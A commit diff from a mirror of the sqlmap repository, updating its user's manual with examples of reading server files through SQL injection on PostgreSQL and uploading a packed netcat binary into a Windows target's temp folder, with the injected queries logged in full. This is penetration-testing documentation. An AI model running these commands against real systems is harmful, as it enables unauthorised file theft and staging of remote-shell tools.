mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 11:03:47 +03:00
Minor update to the user's manual, almost there to release 0.7 stable!
This commit is contained in:
parent
b2b2ec8a26
commit
576cc97742
144
doc/README.html
144
doc/README.html
|
@ -8,7 +8,7 @@
|
||||||
<H1>sqlmap user's manual</H1>
|
<H1>sqlmap user's manual</H1>
|
||||||
|
|
||||||
<H2>by
|
<H2>by
|
||||||
<A HREF="mailto:bernardo.damele@gmail.com">Bernardo Damele A. G.</A></H2>version 0.7 release candidate 1, April 22, 2009
|
<A HREF="mailto:bernardo.damele@gmail.com">Bernardo Damele A. G.</A></H2>version 0.7, July 25, 2009
|
||||||
<HR>
|
<HR>
|
||||||
<EM>This document is the user's manual to use
|
<EM>This document is the user's manual to use
|
||||||
<A HREF="http://sqlmap.sourceforge.net">sqlmap</A>.
|
<A HREF="http://sqlmap.sourceforge.net">sqlmap</A>.
|
||||||
|
@ -3950,16 +3950,120 @@ support when the back-end DBMS is PostgreSQL.</P>
|
||||||
|
|
||||||
<P>Option: <CODE>--read-file</CODE></P>
|
<P>Option: <CODE>--read-file</CODE></P>
|
||||||
|
|
||||||
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
|
<P>It is possible to retrieve the content of files from the underlying file
|
||||||
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
|
system when the back-end database management is system is either MySQL,
|
||||||
|
PostgreSQL or Microsoft SQL Server.
|
||||||
|
The file specified can be either a text or a binary file, sqlmap will
|
||||||
|
handle either cases automatically.</P>
|
||||||
|
|
||||||
|
<P>The techniques implemented are detailed on the white paper
|
||||||
|
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
|
||||||
|
|
||||||
|
<P>Example on a <B>PostgreSQL 8.3.5</B> target:</P>
|
||||||
|
<P>
|
||||||
|
<BLOCKQUOTE><CODE>
|
||||||
|
<PRE>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --read-file \
|
||||||
|
"C:\example.txt" -v2
|
||||||
|
|
||||||
|
[...]
|
||||||
|
[hh:mm:53] [INFO] the back-end DBMS is PostgreSQL
|
||||||
|
web server operating system: Windows 2003 or 2008
|
||||||
|
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
|
||||||
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
|
[hh:mm:53] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[hh:mm:53] [INFO] detecting back-end DBMS version from its banner
|
||||||
|
[hh:mm:53] [DEBUG] query: COALESCE(CAST(SUBSTR((VERSION())::text, 12, 6) AS CHARACTER(10000)),
|
||||||
|
CHR(32))
|
||||||
|
[hh:mm:53] [INFO] retrieved: 8.3.5,
|
||||||
|
[hh:mm:58] [DEBUG] performed 49 queries in 4 seconds
|
||||||
|
[hh:mm:58] [DEBUG] query: SELECT PG_SLEEP(5)
|
||||||
|
[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[hh:mm:03] [INFO] fingerprinting the back-end DBMS operating system
|
||||||
|
[hh:mm:03] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
[hh:mm:03] [DEBUG] query: CREATE TABLE sqlmapfile(data character(500))
|
||||||
|
[hh:mm:03] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
|
||||||
|
[hh:mm:03] [DEBUG] query: SELECT (CASE WHEN ((SELECT LENGTH(data) FROM sqlmapfile WHERE data
|
||||||
|
LIKE CHR(37)||CHR(32)||CHR(86)||CHR(105)||CHR(115)||CHR(117)||CHR(97)||CHR(108)||CHR(32)||
|
||||||
|
CHR(67)||CHR(43)||CHR(43)||CHR(37))>0) THEN 1 ELSE 0 END)
|
||||||
|
[hh:mm:03] [INFO] retrieved: 1
|
||||||
|
[hh:mm:03] [DEBUG] performed 5 queries in 0 seconds
|
||||||
|
[hh:mm:03] [INFO] the back-end DBMS operating system is Windows
|
||||||
|
[hh:mm:03] [DEBUG] cleaning up the database management system
|
||||||
|
[hh:mm:03] [DEBUG] removing support tables
|
||||||
|
[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
[hh:mm:04] [DEBUG] going to read the file with stacked query SQL injection technique
|
||||||
|
[hh:mm:04] [WARNING] binary file read on PostgreSQL is not yet supported, if the requested file
|
||||||
|
is binary, its content will not be retrieved
|
||||||
|
[hh:mm:04] [INFO] fetching file: 'C:/example.txt'
|
||||||
|
[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
[hh:mm:04] [DEBUG] query: CREATE TABLE sqlmapfile(data bytea)
|
||||||
|
[hh:mm:04] [DEBUG] loading the content of file 'C:/example.txt' into support table
|
||||||
|
[hh:mm:04] [DEBUG] query: COPY sqlmapfile(data) FROM 'C:/example.txt'
|
||||||
|
[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(COUNT(data) AS CHARACTER(10000)), CHR(32)) FROM
|
||||||
|
sqlmapfile
|
||||||
|
[hh:mm:04] [INFO] retrieved: 1
|
||||||
|
[hh:mm:04] [DEBUG] performed 6 queries in 0 seconds
|
||||||
|
[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(ENCODE(data, CHR(98)||CHR(97)||CHR(115)||CHR(101)
|
||||||
|
||CHR(54)||CHR(52)) AS CHARACTER(10000)), CHR(32)) FROM sqlmapfile OFFSET 0 LIMIT 1
|
||||||
|
[hh:mm:04] [INFO] retrieved: VGhpcyBpcyBhIHRleHQgZmlsZQ==
|
||||||
|
[hh:mm:22] [DEBUG] performed 203 queries in 18 seconds
|
||||||
|
[hh:mm:22] [DEBUG] cleaning up the database management system
|
||||||
|
[hh:mm:22] [DEBUG] removing support tables
|
||||||
|
[hh:mm:22] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
C:/example.txt file saved to: '/home/inquis/sqlmap/output/192.168.1.121/files/C__example.txt'
|
||||||
|
|
||||||
|
[hh:mm:22] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/192.168.1.121'
|
||||||
|
|
||||||
|
$ cat output/192.168.1.121/files/C__example.txt
|
||||||
|
This is a text file
|
||||||
|
</PRE>
|
||||||
|
</CODE></BLOCKQUOTE>
|
||||||
|
</P>
|
||||||
|
|
||||||
|
|
||||||
<H3>Write a local file on the back-end DBMS file system</H3>
|
<H3>Write a local file on the back-end DBMS file system</H3>
|
||||||
|
|
||||||
<P>Options: <CODE>--write-file</CODE> and <CODE>--dest-file</CODE></P>
|
<P>Options: <CODE>--write-file</CODE> and <CODE>--dest-file</CODE></P>
|
||||||
|
|
||||||
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
|
<P>It is possible to upload a local file to the underlying file system when
|
||||||
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
|
the back-end database management is system is either MySQL, PostgreSQL or
|
||||||
|
Microsoft SQL Server.
|
||||||
|
The file specified can be either a text or a binary file, sqlmap will
|
||||||
|
handle either cases automatically.</P>
|
||||||
|
|
||||||
|
<P>The techniques implemented are detailed on the white paper
|
||||||
|
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
|
||||||
|
|
||||||
|
<P>Example on a <B>MySQL 5.0.67</B> target:</P>
|
||||||
|
<P>
|
||||||
|
<BLOCKQUOTE><CODE>
|
||||||
|
<PRE>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --write-file \
|
||||||
|
"/home/inquis/software/netcat/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1
|
||||||
|
|
||||||
|
[...]
|
||||||
|
[01:12:29] [INFO] the back-end DBMS is MySQL
|
||||||
|
web server operating system: Windows 2003 or 2008
|
||||||
|
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
|
||||||
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
|
[01:12:29] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[01:12:29] [INFO] detecting back-end DBMS version from its banner
|
||||||
|
[01:12:29] [INFO] retrieved: 5.0.67
|
||||||
|
[01:12:36] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[01:12:36] [INFO] fingerprinting the back-end DBMS operating system
|
||||||
|
[01:12:36] [INFO] retrieved: C
|
||||||
|
[01:12:36] [INFO] the back-end DBMS operating system is Windows
|
||||||
|
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully
|
||||||
|
written on the back-end DBMS file system? [Y/n] y
|
||||||
|
[01:12:52] [INFO] retrieved: 31744
|
||||||
|
[01:12:52] [INFO] the file has been successfully written and its size is 31744 bytes, same
|
||||||
|
size as the local file '/home/inquis/software/netcat/nc.exe.packed'
|
||||||
|
</PRE>
|
||||||
|
</CODE></BLOCKQUOTE>
|
||||||
|
</P>
|
||||||
|
|
||||||
|
|
||||||
<H2><A NAME="ss5.9">5.9</A> <A HREF="#toc5.9">Operating system access</A>
|
<H2><A NAME="ss5.9">5.9</A> <A HREF="#toc5.9">Operating system access</A>
|
||||||
|
@ -3969,40 +4073,50 @@ support when the back-end DBMS is PostgreSQL.</P>
|
||||||
|
|
||||||
<P>Option: <CODE>--os-cmd</CODE></P>
|
<P>Option: <CODE>--os-cmd</CODE></P>
|
||||||
|
|
||||||
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
|
<P>TODO</P>
|
||||||
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
|
|
||||||
|
<P>The techniques implemented are detailed on the white paper
|
||||||
|
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
|
||||||
|
|
||||||
|
|
||||||
<H3>Prompt for an interactive operating system shell</H3>
|
<H3>Prompt for an interactive operating system shell</H3>
|
||||||
|
|
||||||
<P>Option: <CODE>--os-shell</CODE></P>
|
<P>Option: <CODE>--os-shell</CODE></P>
|
||||||
|
|
||||||
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
|
<P>TODO</P>
|
||||||
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
|
|
||||||
|
<P>The techniques implemented are detailed on the white paper
|
||||||
|
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
|
||||||
|
|
||||||
|
|
||||||
<H3>Prompt for an out-of-band shell, meterpreter or VNC</H3>
|
<H3>Prompt for an out-of-band shell, meterpreter or VNC</H3>
|
||||||
|
|
||||||
<P>Options: <CODE>--os-pwn</CODE>, <CODE>--priv-esc</CODE>, <CODE>--msf-path</CODE> and <CODE>--tmp-path</CODE></P>
|
<P>Options: <CODE>--os-pwn</CODE>, <CODE>--priv-esc</CODE>, <CODE>--msf-path</CODE> and <CODE>--tmp-path</CODE></P>
|
||||||
|
|
||||||
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
|
<P>TODO</P>
|
||||||
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
|
|
||||||
|
<P>The techniques implemented are detailed on the white paper
|
||||||
|
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
|
||||||
|
|
||||||
|
|
||||||
<H3>One click prompt for an out-of-band shell, meterpreter or VNC</H3>
|
<H3>One click prompt for an out-of-band shell, meterpreter or VNC</H3>
|
||||||
|
|
||||||
<P>Options: <CODE>--os-smbrelay</CODE>, <CODE>--priv-esc</CODE> and <CODE>--msf-path</CODE></P>
|
<P>Options: <CODE>--os-smbrelay</CODE>, <CODE>--priv-esc</CODE> and <CODE>--msf-path</CODE></P>
|
||||||
|
|
||||||
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
|
<P>TODO</P>
|
||||||
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
|
|
||||||
|
<P>The techniques implemented are detailed on the white paper
|
||||||
|
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
|
||||||
|
|
||||||
|
|
||||||
<H3>Stored procedure buffer overflow exploitation</H3>
|
<H3>Stored procedure buffer overflow exploitation</H3>
|
||||||
|
|
||||||
<P>Options: <CODE>--os-bof</CODE>, <CODE>--priv-esc</CODE> and <CODE>--msf-path</CODE></P>
|
<P>Options: <CODE>--os-bof</CODE>, <CODE>--priv-esc</CODE> and <CODE>--msf-path</CODE></P>
|
||||||
|
|
||||||
<P>This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper
|
<P>TODO</P>
|
||||||
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A> for the moment.</P>
|
|
||||||
|
<P>The techniques implemented are detailed on the white paper
|
||||||
|
<A HREF="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf">Advanced SQL injection to operating system full control</A>.</P>
|
||||||
|
|
||||||
|
|
||||||
<H2><A NAME="ss5.10">5.10</A> <A HREF="#toc5.10">Miscellaneous</A>
|
<H2><A NAME="ss5.10">5.10</A> <A HREF="#toc5.10">Miscellaneous</A>
|
||||||
|
|
BIN
doc/README.pdf
BIN
doc/README.pdf
Binary file not shown.
140
doc/README.sgml
140
doc/README.sgml
|
@ -4,7 +4,7 @@
|
||||||
|
|
||||||
<title>sqlmap user's manual
|
<title>sqlmap user's manual
|
||||||
<author>by <htmlurl url="mailto:bernardo.damele@gmail.com" name="Bernardo Damele A. G.">
|
<author>by <htmlurl url="mailto:bernardo.damele@gmail.com" name="Bernardo Damele A. G.">
|
||||||
<date>version 0.7 release candidate 1, April 22, 2009
|
<date>version 0.7, July 25, 2009
|
||||||
<abstract>
|
<abstract>
|
||||||
This document is the user's manual to use <htmlurl url="http://sqlmap.sourceforge.net" name="sqlmap">.
|
This document is the user's manual to use <htmlurl url="http://sqlmap.sourceforge.net" name="sqlmap">.
|
||||||
Check the project <htmlurl url="http://sqlmap.sourceforge.net" name="homepage">
|
Check the project <htmlurl url="http://sqlmap.sourceforge.net" name="homepage">
|
||||||
|
@ -3846,7 +3846,76 @@ support when the back-end DBMS is PostgreSQL.
|
||||||
Option: <tt>--read-file</tt>
|
Option: <tt>--read-file</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper <htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control"> for the moment.
|
It is possible to retrieve the content of files from the underlying file
|
||||||
|
system when the back-end database management is system is either MySQL,
|
||||||
|
PostgreSQL or Microsoft SQL Server.
|
||||||
|
The file specified can be either a text or a binary file, sqlmap will
|
||||||
|
handle either cases automatically.
|
||||||
|
|
||||||
|
<p>
|
||||||
|
The techniques implemented are detailed on the white paper
|
||||||
|
<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control">.
|
||||||
|
|
||||||
|
<p>
|
||||||
|
Example on a <bf>PostgreSQL 8.3.5</bf> target:
|
||||||
|
|
||||||
|
<tscreen><verb>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" --read-file \
|
||||||
|
"C:\example.txt" -v2
|
||||||
|
|
||||||
|
[...]
|
||||||
|
[hh:mm:53] [INFO] the back-end DBMS is PostgreSQL
|
||||||
|
web server operating system: Windows 2003 or 2008
|
||||||
|
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
|
||||||
|
back-end DBMS: PostgreSQL
|
||||||
|
|
||||||
|
[hh:mm:53] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[hh:mm:53] [INFO] detecting back-end DBMS version from its banner
|
||||||
|
[hh:mm:53] [DEBUG] query: COALESCE(CAST(SUBSTR((VERSION())::text, 12, 6) AS CHARACTER(10000)),
|
||||||
|
CHR(32))
|
||||||
|
[hh:mm:53] [INFO] retrieved: 8.3.5,
|
||||||
|
[hh:mm:58] [DEBUG] performed 49 queries in 4 seconds
|
||||||
|
[hh:mm:58] [DEBUG] query: SELECT PG_SLEEP(5)
|
||||||
|
[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[hh:mm:03] [INFO] fingerprinting the back-end DBMS operating system
|
||||||
|
[hh:mm:03] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
[hh:mm:03] [DEBUG] query: CREATE TABLE sqlmapfile(data character(500))
|
||||||
|
[hh:mm:03] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION())
|
||||||
|
[hh:mm:03] [DEBUG] query: SELECT (CASE WHEN ((SELECT LENGTH(data) FROM sqlmapfile WHERE data
|
||||||
|
LIKE CHR(37)||CHR(32)||CHR(86)||CHR(105)||CHR(115)||CHR(117)||CHR(97)||CHR(108)||CHR(32)||
|
||||||
|
CHR(67)||CHR(43)||CHR(43)||CHR(37))>0) THEN 1 ELSE 0 END)
|
||||||
|
[hh:mm:03] [INFO] retrieved: 1
|
||||||
|
[hh:mm:03] [DEBUG] performed 5 queries in 0 seconds
|
||||||
|
[hh:mm:03] [INFO] the back-end DBMS operating system is Windows
|
||||||
|
[hh:mm:03] [DEBUG] cleaning up the database management system
|
||||||
|
[hh:mm:03] [DEBUG] removing support tables
|
||||||
|
[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
[hh:mm:04] [DEBUG] going to read the file with stacked query SQL injection technique
|
||||||
|
[hh:mm:04] [WARNING] binary file read on PostgreSQL is not yet supported, if the requested file
|
||||||
|
is binary, its content will not be retrieved
|
||||||
|
[hh:mm:04] [INFO] fetching file: 'C:/example.txt'
|
||||||
|
[hh:mm:04] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
[hh:mm:04] [DEBUG] query: CREATE TABLE sqlmapfile(data bytea)
|
||||||
|
[hh:mm:04] [DEBUG] loading the content of file 'C:/example.txt' into support table
|
||||||
|
[hh:mm:04] [DEBUG] query: COPY sqlmapfile(data) FROM 'C:/example.txt'
|
||||||
|
[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(COUNT(data) AS CHARACTER(10000)), CHR(32)) FROM
|
||||||
|
sqlmapfile
|
||||||
|
[hh:mm:04] [INFO] retrieved: 1
|
||||||
|
[hh:mm:04] [DEBUG] performed 6 queries in 0 seconds
|
||||||
|
[hh:mm:04] [DEBUG] query: SELECT COALESCE(CAST(ENCODE(data, CHR(98)||CHR(97)||CHR(115)||CHR(101)
|
||||||
|
||CHR(54)||CHR(52)) AS CHARACTER(10000)), CHR(32)) FROM sqlmapfile OFFSET 0 LIMIT 1
|
||||||
|
[hh:mm:04] [INFO] retrieved: VGhpcyBpcyBhIHRleHQgZmlsZQ==
|
||||||
|
[hh:mm:22] [DEBUG] performed 203 queries in 18 seconds
|
||||||
|
[hh:mm:22] [DEBUG] cleaning up the database management system
|
||||||
|
[hh:mm:22] [DEBUG] removing support tables
|
||||||
|
[hh:mm:22] [DEBUG] query: DROP TABLE sqlmapfile
|
||||||
|
C:/example.txt file saved to: '/home/inquis/sqlmap/output/192.168.1.121/files/C__example.txt'
|
||||||
|
|
||||||
|
[hh:mm:22] [INFO] Fetched data logged to text files under '/home/inquis/sqlmap/output/192.168.1.121'
|
||||||
|
|
||||||
|
$ cat output/192.168.1.121/files/C__example.txt
|
||||||
|
This is a text file
|
||||||
|
</verb></tscreen>
|
||||||
|
|
||||||
|
|
||||||
<sect2>Write a local file on the back-end DBMS file system
|
<sect2>Write a local file on the back-end DBMS file system
|
||||||
|
@ -3855,7 +3924,42 @@ This paragraph will be written for sqlmap 0.7 stable version, refer to the white
|
||||||
Options: <tt>--write-file</tt> and <tt>--dest-file</tt>
|
Options: <tt>--write-file</tt> and <tt>--dest-file</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper <htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control"> for the moment.
|
It is possible to upload a local file to the underlying file system when
|
||||||
|
the back-end database management is system is either MySQL, PostgreSQL or
|
||||||
|
Microsoft SQL Server.
|
||||||
|
The file specified can be either a text or a binary file, sqlmap will
|
||||||
|
handle either cases automatically.
|
||||||
|
|
||||||
|
<p>
|
||||||
|
The techniques implemented are detailed on the white paper
|
||||||
|
<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control">.
|
||||||
|
|
||||||
|
<p>
|
||||||
|
Example on a <bf>MySQL 5.0.67</bf> target:
|
||||||
|
|
||||||
|
<tscreen><verb>
|
||||||
|
$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --write-file \
|
||||||
|
"/home/inquis/software/netcat/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1
|
||||||
|
|
||||||
|
[...]
|
||||||
|
[01:12:29] [INFO] the back-end DBMS is MySQL
|
||||||
|
web server operating system: Windows 2003 or 2008
|
||||||
|
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
|
||||||
|
back-end DBMS: MySQL >= 5.0.0
|
||||||
|
|
||||||
|
[01:12:29] [INFO] testing stacked queries support on parameter 'id'
|
||||||
|
[01:12:29] [INFO] detecting back-end DBMS version from its banner
|
||||||
|
[01:12:29] [INFO] retrieved: 5.0.67
|
||||||
|
[01:12:36] [INFO] the web application supports stacked queries on parameter 'id'
|
||||||
|
[01:12:36] [INFO] fingerprinting the back-end DBMS operating system
|
||||||
|
[01:12:36] [INFO] retrieved: C
|
||||||
|
[01:12:36] [INFO] the back-end DBMS operating system is Windows
|
||||||
|
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully
|
||||||
|
written on the back-end DBMS file system? [Y/n] y
|
||||||
|
[01:12:52] [INFO] retrieved: 31744
|
||||||
|
[01:12:52] [INFO] the file has been successfully written and its size is 31744 bytes, same
|
||||||
|
size as the local file '/home/inquis/software/netcat/nc.exe.packed'
|
||||||
|
</verb></tscreen>
|
||||||
|
|
||||||
|
|
||||||
<sect1>Operating system access
|
<sect1>Operating system access
|
||||||
|
@ -3866,7 +3970,11 @@ This paragraph will be written for sqlmap 0.7 stable version, refer to the white
|
||||||
Option: <tt>--os-cmd</tt>
|
Option: <tt>--os-cmd</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper <htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control"> for the moment.
|
TODO
|
||||||
|
|
||||||
|
<p>
|
||||||
|
The techniques implemented are detailed on the white paper
|
||||||
|
<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control">.
|
||||||
|
|
||||||
|
|
||||||
<sect2>Prompt for an interactive operating system shell
|
<sect2>Prompt for an interactive operating system shell
|
||||||
|
@ -3875,7 +3983,11 @@ This paragraph will be written for sqlmap 0.7 stable version, refer to the white
|
||||||
Option: <tt>--os-shell</tt>
|
Option: <tt>--os-shell</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper <htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control"> for the moment.
|
TODO
|
||||||
|
|
||||||
|
<p>
|
||||||
|
The techniques implemented are detailed on the white paper
|
||||||
|
<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control">.
|
||||||
|
|
||||||
|
|
||||||
<sect2>Prompt for an out-of-band shell, meterpreter or VNC
|
<sect2>Prompt for an out-of-band shell, meterpreter or VNC
|
||||||
|
@ -3884,7 +3996,11 @@ This paragraph will be written for sqlmap 0.7 stable version, refer to the white
|
||||||
Options: <tt>--os-pwn</tt>, <tt>--priv-esc</tt>, <tt>--msf-path</tt> and <tt>--tmp-path</tt>
|
Options: <tt>--os-pwn</tt>, <tt>--priv-esc</tt>, <tt>--msf-path</tt> and <tt>--tmp-path</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper <htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control"> for the moment.
|
TODO
|
||||||
|
|
||||||
|
<p>
|
||||||
|
The techniques implemented are detailed on the white paper
|
||||||
|
<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control">.
|
||||||
|
|
||||||
|
|
||||||
<sect2>One click prompt for an out-of-band shell, meterpreter or VNC
|
<sect2>One click prompt for an out-of-band shell, meterpreter or VNC
|
||||||
|
@ -3893,7 +4009,11 @@ This paragraph will be written for sqlmap 0.7 stable version, refer to the white
|
||||||
Options: <tt>--os-smbrelay</tt>, <tt>--priv-esc</tt> and <tt>--msf-path</tt>
|
Options: <tt>--os-smbrelay</tt>, <tt>--priv-esc</tt> and <tt>--msf-path</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper <htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control"> for the moment.
|
TODO
|
||||||
|
|
||||||
|
<p>
|
||||||
|
The techniques implemented are detailed on the white paper
|
||||||
|
<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control">.
|
||||||
|
|
||||||
|
|
||||||
<sect2>Stored procedure buffer overflow exploitation
|
<sect2>Stored procedure buffer overflow exploitation
|
||||||
|
@ -3902,7 +4022,11 @@ This paragraph will be written for sqlmap 0.7 stable version, refer to the white
|
||||||
Options: <tt>--os-bof</tt>, <tt>--priv-esc</tt> and <tt>--msf-path</tt>
|
Options: <tt>--os-bof</tt>, <tt>--priv-esc</tt> and <tt>--msf-path</tt>
|
||||||
|
|
||||||
<p>
|
<p>
|
||||||
This paragraph will be written for sqlmap 0.7 stable version, refer to the white paper <htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control"> for the moment.
|
TODO
|
||||||
|
|
||||||
|
<p>
|
||||||
|
The techniques implemented are detailed on the white paper
|
||||||
|
<htmlurl url="http://sqlmap.sourceforge.net/doc/BlackHat-Europe-09-Damele-A-G-Advanced-SQL-injection-whitepaper.pdf" name="Advanced SQL injection to operating system full control">.
|
||||||
|
|
||||||
|
|
||||||
<sect1>Miscellaneous
|
<sect1>Miscellaneous
|
||||||
|
|
Loading…
Reference in New Issue
Block a user